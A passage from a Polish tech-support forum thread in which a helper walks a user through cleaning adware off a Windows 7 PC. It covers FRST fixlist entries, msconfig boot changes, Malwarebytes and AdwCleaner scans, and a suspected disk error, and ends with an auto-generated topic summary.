    2019-05-31 11:25 - 2019-05-31 11:25 - 000126464 _____ C:\Users\HP\AppData\Local\noah.dat
    2019-05-31 11:25 - 2019-05-31 11:25 - 000126464 _____ C:\Users\HP\AppData\Local\lobby.dat
    2019-05-31 11:25 - 2019-05-31 11:25 - 000072787 _____ C:\Users\HP\AppData\Local\Betafinity.tst
    2019-05-31 11:25 - 2019-05-31 11:25 - 000070992 _____ C:\Users\HP\AppData\Local\Config.xml
    2019-05-31 11:25 - 2019-05-31 11:25 - 000054272 _____ C:\Users\HP\AppData\Local\ApplicationHosting.dat
    2019-05-31 11:25 - 2019-05-31 11:25 - 000018432 _____ C:\Users\HP\AppData\Local\Main.dat
    2019-05-31 11:25 - 2019-05-31 11:25 - 000016416 _____ C:\Users\HP\AppData\Local\InstallationConfiguration.xml
    2019-05-31 11:25 - 2019-05-31 11:25 - 000005568 _____ C:\Users\HP\AppData\Local\md.xml
    2019-05-31 10:10 - 2019-05-31 10:11 - 000000000 ____D C:\AdwCleaner
    2019-05-31 11:25 - 2019-05-31 11:25 - 007942656 _____ () C:\Users\HP\AppData\Local\agent.dat
    2019-05-31 11:25 - 2019-05-31 11:25 - 000054272 _____ () C:\Users\HP\AppData\Local\ApplicationHosting.dat
    2019-05-31 11:25 - 2019-05-31 11:25 - 001630720 _____ (TODO: <Company name>) C:\Users\HP\AppData\Local\Betafinity.exe
    2019-05-31 11:25 - 2019-05-31 11:25 - 000072787 _____ () C:\Users\HP\AppData\Local\Betafinity.tst
    2019-03-24 20:44 - 2019-03-24 20:44 - 000000000 ____H () C:\Users\HP\AppData\Local\BIT9404.tmp
    2019-05-31 11:25 - 2019-05-31 11:25 - 000070992 _____ () C:\Users\HP\AppData\Local\Config.xml
    2019-05-31 11:25 - 2019-05-31 11:25 - 001630720 _____ (TODO: <Company name>) C:\Users\HP\AppData\Local\IceFresh.exe
    2019-05-31 11:25 - 2019-05-31 11:25 - 002038659 _____ () C:\Users\HP\AppData\Local\IceFresh.tst
    2019-05-31 11:25 - 2019-05-31 11:25 - 000016416 _____ () C:\Users\HP\AppData\Local\InstallationConfiguration.xml
    2019-05-31 11:25 - 2019-05-31 11:25 - 000140800 _____ () C:\Users\HP\AppData\Local\installer.dat
    2019-05-31 11:25 - 2019-05-31 11:25 - 000126464 _____ () C:\Users\HP\AppData\Local\lobby.dat
    2019-05-31 11:25 - 2019-05-31 11:25 - 000018432 _____ () C:\Users\HP\AppData\Local\Main.dat
    2019-05-31 11:25 - 2019-05-31 11:25 - 000005568 _____ () C:\Users\HP\AppData\Local\md.xml
    2019-05-31 11:25 - 2019-05-31 11:25 - 000126464 _____ () C:\Users\HP\AppData\Local\noah.dat
    2019-05-31 11:25 - 2019-05-31 12:28 - 000722944 _____ () C:\Users\HP\AppData\Local\sha.db
    2019-05-31 11:25 - 2019-05-31 11:25 - 000032038 _____ () C:\Users\HP\AppData\Local\uninstall_temp.ico
    2019-03-24 20:44 - 2019-03-24 20:44 - 000000000 _____ () C:\Users\HP\AppData\Local\{8F99C1A7-50C2-4DBA-82E5-428910D90C6D}

    Po wykonaniu zrob skan przy pomocy mbam oraz adwc, powinny juz dzialac.

    Na koniec zamiesc nowe logi z FRST, ze skanowania.
  • #15 17997123
    CamtraX
    Poziom 6  
    Posty: 15
    Ocena: 6
    [quote="Kolobos"]Uruchom msconfig, w zakladce Rozruch usun Windows Fast Mode i ustaw jako domyslny Windows 7.

    Odinstaluj: CloudNet
    ------------------------------------------------------------------------

    Windows Fast Mode - nie można usunąć jest tylko podświetlone - opcje zaawansowane - po wejściu nic nie jest podświetlone do zmiany - ustawiony domyślny Windows 7

    CloudNet z pozycji Win dodaj/usuń programy wyskakuje okno załączone powyżej - po wpisaniu kodu z okna zniknął z widoku w dostępnych programach - zapewne pojawi się po rozruchu jak poprzednio
    edit po zmianie na win7 jako domyślny i po auto rozruchu - nie pojawił się

    robię naprawę FRST - następny post
  • #16 17997174
    Kolobos
    Spec od komputerów
    Posty: 85156
    Pomógł: 17160
    Ocena: 10424
    W msconfig ustawiasz jako domyslna opcje Windows 7 i dopiero usuwasz Windows Fast Mode. Musi dzialac, z tego co piszesz dalej to chyba CI sie udalo?
  • #17 17997179
    CamtraX
    Poziom 6  
    Posty: 15
    Ocena: 6
    Kolobos napisał:
    W msconfig ustawiasz jako domyslna opcje Windows 7 i dopiero usuwasz Windows Fast Mode. Musi dzialac, z tego co piszesz dalej to chyba CI sie udalo?
    .

    po restarcie teraz jeszcze raz sprawdziłem i usunąłem.
    ....włączam naprawę

    Dodano po 11 [godziny] 41 [minuty]:

    nowe logi z FRST w załączniku.
    programy odpalają i F8 działa!

    Dzięki

    zauważyłem iż programy wolniej się odpalają jak i system.
    Jutro tylko zainstalowanie ochrony.
    Załączniki:
    • FRST.txt (69.26 KB) Musisz być zalogowany, aby pobrać ten załącznik.
    • Addition.txt (26.4 KB) Musisz być zalogowany, aby pobrać ten załącznik.
  • #18 17998561
    Kolobos
    Spec od komputerów
    Posty: 85156
    Pomógł: 17160
    Ocena: 10424
    Masz jakis problem z dyskiem:
    Error: (06/05/2019 10:53:26 PM) (Source: Disk) (EventID: 11) (User: )
    Description: Sterownik wykrył błąd kontrolera na \Device\Harddisk1\DR2.

    Zamiesc screen calego okna z Crystal Disk Info Portable (dla wszystkich dyskow).

    Kolejny Fixlist.txt:
    Task: {E6E1EF11-EBD7-48C0-BA2D-63DC72DB36C1} - \ScheduledUpdate -> Brak pliku <==== UWAGA
    S3 MBAMProtection; \??\C:\Windows\system32\DRIVERS\mbam.sys [X]
    2019-06-05 22:37 - 2019-06-05 22:39 - 000000000 ____D C:\AdwCleaner
    2019-06-05 11:03 - 2019-06-05 11:03 - 000000008 __RSH C:\ProgramData\ntuser.pol
    EmptyTemp:

    Wykonales juz skan przy pomocy mbam?
  • #19 17998735
    CamtraX
    Poziom 6  
    Posty: 15
    Ocena: 6
    Kolobos napisał:

    Wykonales juz skan przy pomocy mbam?


    Wszystko według zaleceń.

    screen całego okna z Crystal Disk Info Portable (jest jeden- 2partycje):
    Stworzenie skryptu fixlist.txt dla FRST - problem z uprawnieniami i wirusem

    pozdr

    Dodano po 37 [minuty]:

    działało teraz nie mogę uruchomić - zaplanowane auto też się nie włącza(?)
    Stworzenie skryptu fixlist.txt dla FRST - problem z uprawnieniami i wirusem
  • #20 17998802
    Kolobos
    Spec od komputerów
    Posty: 85156
    Pomógł: 17160
    Ocena: 10424
    Sprawdz czy usluga jest wlaczona tak jak masz podane w komunikacie.
Odpowiedz | Nowy temat
Zgłoś naruszenie prawa

Podsumowanie tematu

✨ Użytkownik zgłosił problem z wirusem, który uniemożliwia aktualizację programów oraz powoduje brak uprawnień. W odpowiedzi na prośbę o stworzenie skryptu naprawczego fixlist.txt dla narzędzia FRST, uczestnicy dyskusji zalecili odinstalowanie kilku programów, w tym SecureAPlus i Advanced SystemCare. Użytkownik wykonał zalecane kroki, jednak nadal napotykał problemy z uprawnieniami oraz zainstalowanymi programami, które same się uruchamiały. Po dalszych instrukcjach dotyczących usuwania niechcianych aplikacji oraz skanowania systemu, użytkownik zdołał przywrócić funkcjonalność systemu, jednak zauważył spowolnienie działania. Wskazano również na problemy z dyskiem twardym, co może wpływać na wydajność systemu.
Wygenerowane przez model językowy.
REKLAMA